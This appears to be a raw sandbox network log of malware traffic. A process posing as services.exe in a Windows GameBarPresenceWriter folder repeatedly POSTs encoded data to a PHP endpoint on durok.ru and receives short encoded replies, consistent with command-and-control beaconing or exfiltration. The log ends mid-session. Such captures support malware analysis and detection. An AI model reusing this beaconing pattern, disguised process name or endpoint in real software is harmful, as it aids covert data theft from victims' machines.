                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262e1eeb87cee-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4127&min_rtt=1845&rtt_var=5256&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=72625&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID: 67 | Source IP: 192.168.2.4 | Source Port: 49855 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:20.234801054 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:20.583687067 CET | 2548 | OUT | [request body]
Dec 26, 2024 17:18:21.412446976 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:21.665853977 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:21 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2ArtAl3hPZXTz%2BVKoAZwgTT1gc2jQmOOdKykDmvxj%2BKurNzcf3TEnlGxaHH4N9LEoEdzm3xNjWvjEOOi%2FtjI1j0Y4Z1zRc0eiCQCRY5sCEROCfQ%2FQNr%2BxbIiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262e2c8c041d9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4329&min_rtt=1604&rtt_var=6052&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=62369&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID: 68 | Source IP: 192.168.2.4 | Source Port: 49857 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:22.182106972 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:22.536703110 CET | 2548 | OUT | [request body]
Dec 26, 2024 17:18:23.347927094 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:23.633919001 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:23 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q1QnFQP0IdrMVt%2BPCzTrTyQPzQRcyvpmyBf2Ke8qCy7XI4ywagOrUM60C7PzX5cA3omnrHtM9gZLLd5Sx77FVRXtWzbXRvYVkdq76VjME%2BPLG6hA%2BHe0Xn2Efg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262eee9354252-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4562&min_rtt=1578&rtt_var=6560&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=57360&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID: 69 | Source IP: 192.168.2.4 | Source Port: 49862 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:22.658243895 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:23.005599976 CET | 2128 | OUT | [request body]
Dec 26, 2024 17:18:23.836373091 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:24.089777946 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:23 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMVW4zMQWUltS8b7v67K9CH8w%2BI%2B%2FA%2BNxBDjIhThe3fV0EiXCAxMvFcpPaYubyJnhpUU6zzMKBt7htCqOVW2M3CyUaP27BZ4CHxoXImsc1G%2BBFvTFbATvgMzCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262f1ff35efa7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4256&min_rtt=1774&rtt_var=5630&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=67480&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 3e 17 38 0f 23 05 2c 13 3c 3d 2a 1b 2a 31 3a 05 2b 1c 39 5f 2b 3c 22 57 28 38 05 51 23 39 2d 01 3e 3a 20 5c 25 26 36 5a 26 21 2e 5c 05 1d 27 5e 28 05 33 01 30 1c 21 5a 3d 10 22 0a 2a 2d 39 5d 25 2f 3c 04 34 2b 36 5f 22 22 23 02 2c 05 30 1d 2d 3c 09 00 2a 20 32 1f 35 17 21 51 0c 1f 3b 0b 36 07 30 00 25 00 00 0f 36 33 24 08 26 16 08 1f 21 5d 24 0e 33 03 33 5d 26 30 23 1d 23 5b 30 0e 2b 03 00 13 26 59 22 05 29 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$>8#,<=**1:+9_+<"W(8Q#9->: \%&6Z&!.\'^(30!Z="*-9]%/<4+6_""#,0-<* 25!Q;60%63$&!]$33]&0##[0+&Y")%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49863 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:23.873538971 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:24.282423973 CET | 2548 | OUT | Data Raw: 59 5f 5e 5c 51 59 59 54 5e 58 52 54 56 5e 58 55 54 55 5b 5a 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^\QYYT^XRTV^XUTU[ZV^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_+!0]?9!!!<X,X5V*'B<#,(4Z.)7>##*"Z.#Z*
Dec 26, 2024 17:18:25.050838947 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:25.308357000 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:25 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLa1ODdM5mLPdvkH8n4TQ%2BUAk0eV6%2FjQCLBtPkSYAPymd%2B%2BHYHhSlGaYJdwshb2LJy0mqJE3uhR5e4QplO%2BTZ3DS1knM5sZpB%2F4SHliGi4%2Fy0yzjodXmZgLFGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262f98c8f7cf3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=10676&min_rtt=1799&rtt_var=18429&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=20049&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49869 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:25.386233091 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:25.740341902 CET | 2108 | OUT | Data Raw: 59 58 5b 58 54 55 59 5b 5e 58 52 54 56 5c 58 55 54 57 5b 5d 56 56 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[XTUY[^XRTV\XUTW[]VVS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_+(_(5V"_;5W>7!04Z4#7,*[9) B(#)5"Z.#Z*2
Dec 26, 2024 17:18:26.564126015 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:26.821748972 CET | 948 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:26 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wfr65p6JE%2F8dH7CyLpQ4InlIqRfzzo05%2FFAEl26lN13tdp5twJwgK5%2FndqSp3u%2BzMl8zYuZM8alf7rZkfDOfdBs58jGMc9WE9C2iFDOZyROIZyZOez0EohmwrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826302fc0d42e2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7222&min_rtt=2021&rtt_var=11160&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=33463&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5d 3d 29 3f 1a 37 2c 30 50 2b 2d 0f 09 3d 0f 0b 5d 28 54 39 5c 28 3f 00 1e 28 28 01 51 34 04 3a 1e 2a 04 0a 5b 31 36 26 59 31 31 2e 5c 05 1d 27 17 3e 2b 0a 13 24 32 2a 02 2b 3d 3d 1a 3d 2e 3a 04 27 59 23 5c 23 5d 2a 15 37 21 3c 5c 2f 5a 33 07 2d 05 34 5a 3f 20 00 12 36 07 21 51 0c 1f 38 54 23 3a 23 5b 31 07 3e 0b 22 0e 28 09 31 38 3a 1d 21 05 3b 1d 27 04 30 05 31 33 06 0e 20 13 28 0b 28 2e 32 5a 26 2f 04 02 2b 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$]=)?7,0P+-=](T9\(?((Q4:*[16&Y11.\'>+$2*+===.:'Y#\#]*7!<\/Z3-4Z? 6!Q8T#:#[1>"(18:!;'013 ((.2Z&/+9%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49870 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:25.543854952 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:25.896209002 CET | 2548 | OUT | Data Raw: 5c 5e 5e 5a 51 59 59 51 5e 58 52 54 56 5c 58 51 54 53 5b 5a 56 50 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^ZQYYQ^XRTV\XQTS[ZVPS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+2(_?9!68X..**'&'48#/4?2.:(E?#3*"Z.#Z*2
Dec 26, 2024 17:18:26.721941948 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:26.973664045 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:26 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wx170yYXhI%2BUqYq2skf8JKPHgMN%2BNumhZWNGgyxm7wdfQHZ4jm8xh77YoJ8Xgj1AT%2BSsj2ip%2B5zT1pNR%2FL%2Fpmy%2FWQ66uPkfjB1JLFPJa%2BYbOt6srOVik4ufyxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826303f8a27283-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4935&min_rtt=1813&rtt_var=6925&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=54491&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49876 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:27.774842024 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49877 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:27.954663992 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:28.302345037 CET | 2128 | OUT | Data Raw: 5c 5d 5e 5f 51 59 5c 55 5e 58 52 54 56 58 58 55 54 52 5b 5b 56 54 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \]^_QY\U^XRTVXXUTR[[VTSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'($>9-Q#2(Y,=6?72Z%$,"? Q4!9)$A(++5"Z.#Z*"
Dec 26, 2024 17:18:29.132710934 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:29.407362938 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAMcTriiAysZW8o78On8AEPrhA8so7hyMW%2BsYtxN75uUXkYdErMZnbE5nMXnLuy91d3IFNk%2F%2BvRx4neK4t8SXfYVqLZ7tWVaOZdeXfS8J7mbYvn6qZ6eQAe84w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263130ad24384-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8196&min_rtt=1737&rtt_var=13571&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=27332&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 01 2a 39 06 08 23 3f 30 1d 3c 5b 31 08 29 0f 03 17 3f 22 04 06 2b 59 25 0f 3f 01 28 0b 21 29 26 5c 2a 29 27 03 31 0f 32 5c 31 0b 2e 5c 05 1d 24 06 3f 28 23 00 26 31 3d 59 2a 58 22 46 2a 2d 22 05 27 59 34 03 21 28 22 5f 20 1f 2f 05 2f 2f 2c 5a 2e 2c 34 59 3c 56 3e 12 36 3d 21 51 0c 1f 3b 0e 36 2a 20 06 26 2e 0b 54 21 23 34 0e 25 16 2e 10 35 5d 34 08 33 39 20 03 26 0a 27 10 37 3d 2b 1f 28 2d 32 10 31 3f 25 58 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*9#?0<[1)?"+Y%?(!)&\*)'12\1.\$?(#&1=Y*X"F*-"'Y4!("_ ///,Z.,4Y<V>6=!Q;6* &.T!#4%.5]439 &'7=+(-21?%X))%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49878 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:28.073951006 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:28.427303076 CET | 2548 | OUT | Data Raw: 59 59 5b 5f 51 59 5c 51 5e 58 52 54 56 5f 58 55 54 57 5b 5a 56 50 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[_QY\Q^XRTV_XUTW[ZVPSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+ ?)%P52 ;.))^0', ,8T#<Z.A<0'*"Z.#Z*>
Dec 26, 2024 17:18:29.261287928 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:29.514007092 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6EB%2FJ957hD%2Bxh1FO2PRtECPdFVrg3WLtMvLqGhbHKTrT9rD%2FVEymxoQPnt3gls%2B9Q4YwzZ95cIxEhd2rkf8MeZ92nqHWUyqyA4HNybvAOQst4tg%2Fd8%2Fo%2FFG1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826313de067c88-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4103&min_rtt=1959&rtt_var=5024&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=76367&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49884 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:29.770255089 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:30.115520954 CET | 2548 | OUT | Data Raw: 59 51 5e 5f 54 5c 5c 56 5e 58 52 54 56 5a 58 5b 54 50 5b 5a 56 56 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^_T\\V^XRTVZX[TP[ZVVSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$\<20>)6X/>):Y%'; U7%-*@+#$)%"Z.#Z**
Dec 26, 2024 17:18:30.952878952 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:31.205693960 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:31 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCgUxxMNPYcldwcUe2lq%2FxzTCVVmYUhn1gRkE8frQLrqc1kI8cobbfNlC%2B9mpND4jD%2BE%2Bb0sLu1AZ8PjkMuOjR%2FA75TeJcDVgpvk1N07t4kT4qbhZoYPe2vQlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82631e5f3cefa1-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
